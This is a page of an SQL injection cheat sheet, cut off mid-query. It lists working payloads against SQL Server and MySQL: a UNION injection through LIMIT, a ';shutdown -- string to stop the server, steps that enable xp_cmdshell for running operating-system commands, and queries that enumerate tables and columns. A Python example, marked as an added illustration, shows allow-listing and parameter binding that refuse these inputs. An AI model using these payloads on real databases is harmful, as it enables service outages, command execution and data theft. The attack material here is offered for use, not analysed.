SQL Injection Cheat Sheet, Page 11

IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) -
us/library/ms190312.aspx
You cannot use sub-selects in SQL Server INSERT queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If the injection is in the second LIMIT value, you can comment it out or use it in your UNION injection.
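The defensive counterpart to the LIMIT / ORDER injection above, as an added example that is not part of the original cheat sheet: ORDER BY takes identifiers, which cannot be bound as parameters, so they go through an allow-list, while LIMIT values are validated as integers and bound. Python's sqlite3 stands in for MySQL or SQL Server here; the table data and the names `list_products`, `to_bounded_int` and `demo_db` are constructed for illustration.

```python
import sqlite3

# Allow-lists: only these literals are ever interpolated into the SQL text.
SORTABLE = {"id": "id", "product": "product"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}
MAX_PAGE = 100


def to_bounded_int(value, low, high):
    """Accept only plain ASCII decimal digits, then clamp to [low, high]."""
    text = str(value).strip()
    if not (text.isascii() and text.isdigit()):
        # Rejects signs, commas, quotes, comment markers, UNION, ...
        raise ValueError(f"not an integer: {value!r}")
    return max(low, min(int(text), high))


def list_products(conn, sort="id", direction="asc", offset=0, count=10):
    try:
        column = SORTABLE[sort]
        order = DIRECTIONS[str(direction).lower()]
    except KeyError as exc:
        raise ValueError(f"unsupported sort option: {exc}") from None
    offset = to_bounded_int(offset, 0, 10**6)
    count = to_bounded_int(count, 1, MAX_PAGE)
    # Identifiers come from the allow-list; the numbers are bound parameters.
    sql = f"SELECT id, product FROM test ORDER BY {column} {order} LIMIT ? OFFSET ?"
    return conn.execute(sql, (count, offset)).fetchall()


def demo_db():
    """Constructed sample data standing in for the page's test table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER PRIMARY KEY, product TEXT)")
    conn.executemany("INSERT INTO test VALUES (?, ?)",
                     [(1, "anvil"), (2, "bolt"), (3, "crate")])
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(list_products(db, "product", "desc", 0, 2))
    # The page's LIMIT payload and a stacked ORDER value are both refused.
    for kwargs in ({"count": "0 UNION ALL SELECT 1,'x'/*"}, {"sort": "id; shutdown --"}):
        try:
            list_products(db, **kwargs)
        except ValueError as err:
            print("rejected:", err)
```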
Shutdown SQL Server (S)
When you're really pissed off,
';shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default, xp_cmdshell and a couple of other potentially dangerous stored procedures are
disabled in SQL Server 2005. If you have admin access, you can enable them.
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Moving records (S)
Modify WHERE and use NOT IN or NOT EXISTS,
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXISTS(SELECT TOP 0 name FROM members) -- very good one
Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from
